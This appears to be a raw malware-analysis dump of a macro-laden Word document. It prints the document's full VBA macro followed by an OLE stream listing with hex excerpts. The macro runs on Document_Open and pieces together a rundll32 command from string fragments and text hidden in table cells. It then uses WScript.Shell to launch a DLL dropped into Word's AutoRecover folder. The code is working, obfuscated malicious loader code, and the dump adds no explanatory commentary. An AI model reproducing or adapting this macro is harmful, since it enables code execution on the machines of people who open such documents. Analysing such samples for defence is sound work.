Dim w1, w2 As String
Private Sub Document_Open()
Call stetptwwo
End Sub



Sub stetptwwo()
ji = 0
Call iep
Dim rx As String
 Dim oys As String

 Dim bcvxz As String
rx = "\ferus.d"
Dim mbnd As Integer
Dim kjhnbs As Integer
Call chek
kjhnbs = ji

Dim jkjhb As String
If kjhnbs = 1 Then
Else
Dim jkjhbf As String


Call hhhhh
Dim wrefs As String
wrefs = pit
 bcvxz = wrefs
Dim bfdsdadad As String
Dim erfvbcz As String

bfdsdadad = "n"

Call ks
Call ksa

Dim bcbv As String
bcbv = nmbvd
Dim hgfcvxv As String

Dim oloow As String
oloow = r2
werfsxv = "3" & 2 & oloow
Dim hfgv As String
hfgv = bfdsdadad & "d"


 Dim htyhbv As String
 htyhbv = werfsxv
 Dim hgvmbm As String
 hgvmbm = "r"
 
Dim luyhgdffs As String
luyhgdffs = "l"
 Dim bcvsdsf As String
 bcvsdsf = hgvmbm & "u" & hfgv & "l" & luyhgdffs & htyhbv


hgfcvxv = r1
oys = bcvxz & rx & hgfcvxv & hgfcvxv & ",YYUNXEGQRYS"

 
     Dim xcvxv As Object
Set xcvxv = VBA.CreateObject("WScript.Shell")

xcvxv.Run bcvsdsf & " " & oys

End If
End Sub






Sub chek()

Dim jos As String
Dim pafh As String
pafh = pit
jos = pafh

 
 If Dir(jos & "\ferus.d" & "l" & "l") = "" Then
 ji = 0
 Else

 ji = 1
 End If
End Sub



Sub xzczxc()
w1 = ThisDocument.Tables(1).Cell(1, 1).Range.Text
End Sub




Sub vvvvvvvx()
w2 = ThisDocument.Tables(1).Cell(1, 2).Range.Text
End Sub



Sub ks()
Dim askl As String
Call xzczxc
askl = w1
r1 = Left(askl, 3)

r1 = Right(r1, 1)

End Sub

Sub ksa()
Dim askl As String
Call vvvvvvvx
askl = w2
r2 = Left(askl, 4)
End Sub
Sub q1(dl As String)
pit = dl
End Sub
Sub iep()
Dim kf As String
kf = Options.DefaultFilePath(wdAutoRecoverPath)
Call q1(kf)
Call q2(kf)
Call q3(kf)
Call q4(kf)
Call q5(kf)
End Sub

                                          Streams

                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                          General
                                          Stream Path:\x1CompObj
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.2359563651
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 320
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          File Type:data
                                          Stream Size:320
                                          Entropy:2.63012313926
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 10 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 412
                                          General
                                          Stream Path:\x5SummaryInformation
                                          File Type:data
                                          Stream Size:412
                                          Entropy:3.10336634213
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M y P c . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                                          Stream Path: 1Table, File Type: ARC archive data, crunched, Stream Size: 17642
                                          General
                                          Stream Path:1Table
                                          File Type:ARC archive data, crunched
                                          Stream Size:17642
                                          Entropy:6.30461054818
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                          Data Raw:1a 06 10 00 12 00 01 00 77 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                          Stream Path: Data, File Type: data, Stream Size: 566304
                                          General
                                          Stream Path:Data
                                          File Type:data
                                          Stream Size:566304
                                          Entropy:7.97255502805
                                          Base64 Encoded:True
                                          Data ASCII:. . . $ . . $ . I f . . . . . . l . ! v . . h . # v . . H . : V . . . . l . . t . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . 5 . . . . . . . / . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . y t . C . . . . . . D . d . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:98 00 16 24 01 17 24 01 49 66 01 00 00 00 01 96 6c 00 21 76 00 02 68 01 23 76 00 02 48 12 3a 56 0b 00 02 96 6c 00 0a 74 00 00 a0 04 13 d6 30 00 00 00 ff 04 01 00 00 00 00 00 ff 04 01 00 00 00 00 00 ff 04 01 00 00 00 00 00 ff 04 01 00 00 00 00 00 ff 04 01 00 00 00 00 00 ff 04 01 00 00 14 f6 01 00 00 15 36 01 35 d6 05 00 02 03 b4 12 2f d6 0b 00 02 0f ff ff ff ff ff ff ff ff 70 d6 14
                                          Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 646
                                          General
                                          Stream Path:Macros/PROJECT
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:646
                                          Entropy:5.28301411564
                                          Base64 Encoded:True
                                          Data ASCII:I D = " { 7 9 1 8 1 D B A - 3 4 A C - 4 D 8 A - 8 B 9 2 - 6 1 4 5 2 9 7 2 F 6 E 4 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . M o d u l e = M o d u l e 3 . . M o d u l e = M o d u l e 4 . . M o d u l e = M o d u l e 5 . . M o d u l e = M o d u l e 6 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 4 A 6 7 3 4 4
                                          Data Raw:49 44 3d 22 7b 37 39 31 38 31 44 42 41 2d 33 34 41 43 2d 34 44 38 41 2d 38 42 39 32 2d 36 31 34 35 32 39 37 32 46 36 45 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 32 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 33 0d 0a 4d
                                          Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 185
                                          General
                                          Stream Path:Macros/PROJECTwm
                                          File Type:data
                                          Stream Size:185
                                          Entropy:3.1988943233
                                          Base64 Encoded:False
                                          Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . M o d u l e 4 . M . o . d . u . l . e . 4 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . M o d u l e 6 . M . o . d . u . l . e . 6 . . . . .
                                          Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 4d 6f 64 75 6c 65 32 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 32 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 4d 6f 64 75 6c 65 34 00 4d 00 6f 00 64 00 75 00 6c
                                          Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4858
                                          General
                                          Stream Path:Macros/VBA/_VBA_PROJECT
                                          File Type:data
                                          Stream Size:4858
                                          Entropy:4.95266102607
                                          Base64 Encoded:True
                                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                          Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                          Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 3855
                                          General
                                          Stream Path:Macros/VBA/__SRP_0
                                          File Type:data
                                          Stream Size:3855
                                          Entropy:3.21442122564
                                          Base64 Encoded:False
                                          Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . .
                                          Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00
                                          Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 400
                                          General
                                          Stream Path:Macros/VBA/__SRP_1
                                          File Type:data
                                          Stream Size:400
                                          Entropy:2.22848150291
                                          Base64 Encoded:True
                                          Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d l . . . . . . . . . . . . . . . .
                                          Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 11 00 00 00 00 00 00 00 00 00 07 00 11 00
                                          Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 3439
                                          General
                                          Stream Path:Macros/VBA/__SRP_2
                                          File Type:data
                                          Stream Size:3439
                                          Entropy:3.10193751309
                                          Base64 Encoded:False
                                          Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . 1 . . . . . . . . . . . Q . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . .
                                          Data Raw:72 55 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 09 00 09 00 19 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 f1 00 00 00 00 00 00 00 00 00 04 00 11 10 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 582
                                          General
                                          Stream Path:Macros/VBA/__SRP_3
                                          File Type:data
                                          Stream Size:582
                                          Entropy:2.26624465158
                                          Base64 Encoded:False
                                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . @ . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . . .
                                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 c8 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 40 0e 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                          Stream Path: Macros/VBA/__SRP_4, File Type: data, Stream Size: 545
                                          General
                                          Stream Path:Macros/VBA/__SRP_4
                                          File Type:data
                                          Stream Size:545
                                          Entropy:1.53014437211
                                          Base64 Encoded:False
                                          Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 03 00 03 00 00 00 00 00 48 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 69 02
                                          Stream Path: Macros/VBA/__SRP_5, File Type: data, Stream Size: 286
                                          General
                                          Stream Path:Macros/VBA/__SRP_5
                                          File Type:data
                                          Stream Size:286
                                          Entropy:1.87496371333
                                          Base64 Encoded:False
                                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                          Stream Path: Macros/VBA/__SRP_6, File Type: data, Stream Size: 414
                                          General
                                          Stream Path:Macros/VBA/__SRP_6
                                          File Type:data
                                          Stream Size:414
                                          Entropy:1.54678999411
                                          Base64 Encoded:False
                                          Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . $ . . . . . . . g . . . . . g . . . . . . . . . . . T . . . . . . . . . g . . . . . { . . . . . . .
                                          Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 07 00 10 00 00 00 00 00 00 00 00 00 06 00 02 00 02 00 00 00 00 00 48 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 69 02
                                          Stream Path: Macros/VBA/__SRP_7, File Type: data, Stream Size: 238
                                          General
                                          Stream Path:Macros/VBA/__SRP_7
                                          File Type:data
                                          Stream Size:238
                                          Entropy:1.85430320561
                                          Base64 Encoded:False
                                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . P . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 06 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 18 00 00 00 08 00 40 00 f1 00 00 00 00 00 00 00 00 00 06 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                          Stream Path: Macros/VBA/__SRP_8, File Type: data, Stream Size: 918
                                          General
                                          Stream Path:Macros/VBA/__SRP_8
                                          File Type:data
                                          Stream Size:918
                                          Entropy:1.49183498038
                                          Base64 Encoded:False
                                          Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 09 00 10 00 00 00 00 00 00 00 00 00 08 00 06 00 06 00 00 00 00 00 48 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 69 02
                                          Stream Path: Macros/VBA/__SRP_9, File Type: data, Stream Size: 492
                                          General
                                          Stream Path:Macros/VBA/__SRP_9
                                          File Type:data
                                          Stream Size:492
                                          Entropy:2.05140820265
                                          Base64 Encoded:False
                                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . P . P . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . P . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . .
                                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 08 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 40 00 f1 00 00 00 00 00 00 00 00 00 08 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                          Stream Path: Macros/VBA/__SRP_a, File Type: data, Stream Size: 414
                                          General
                                          Stream Path:Macros/VBA/__SRP_a
                                          File Type:data
                                          Stream Size:414
                                          Entropy:1.54085065935
                                          Base64 Encoded:False
                                          Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . $ . . . . . . . g . . . . . g . . . . . . . . . . . T . . . . . . . . . g . . . . . { . . . . . . . . . . . . . $ . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i .
                                          Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 0b 00 10 00 00 00 00 00 00 00 00 00 0a 00 02 00 02 00 00 00 00 00 70 00 00 00 00 00 00 00 24 00 00 00 00 00 00 00 67 02
                                          Stream Path: Macros/VBA/__SRP_b, File Type: data, Stream Size: 236
                                          General
                                          Stream Path:Macros/VBA/__SRP_b
                                          File Type:data
                                          Stream Size:236
                                          Entropy:1.85784660876
                                          Base64 Encoded:False
                                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . b . . . . . . . . . . . . . . .
                                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 0a 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 40 00 f1 00 00 00 00 00 00 00 00 00 0a 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                          Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 783
                                          General
                                          Stream Path:Macros/VBA/dir
                                          File Type:data
                                          Stream Size:783
                                          Entropy:6.52623966589
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . C { b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E O f f i c . E . O . f . . i . c . E . . . . . . . . E 2 D F . 8 D 0 4 C - 5 B . F
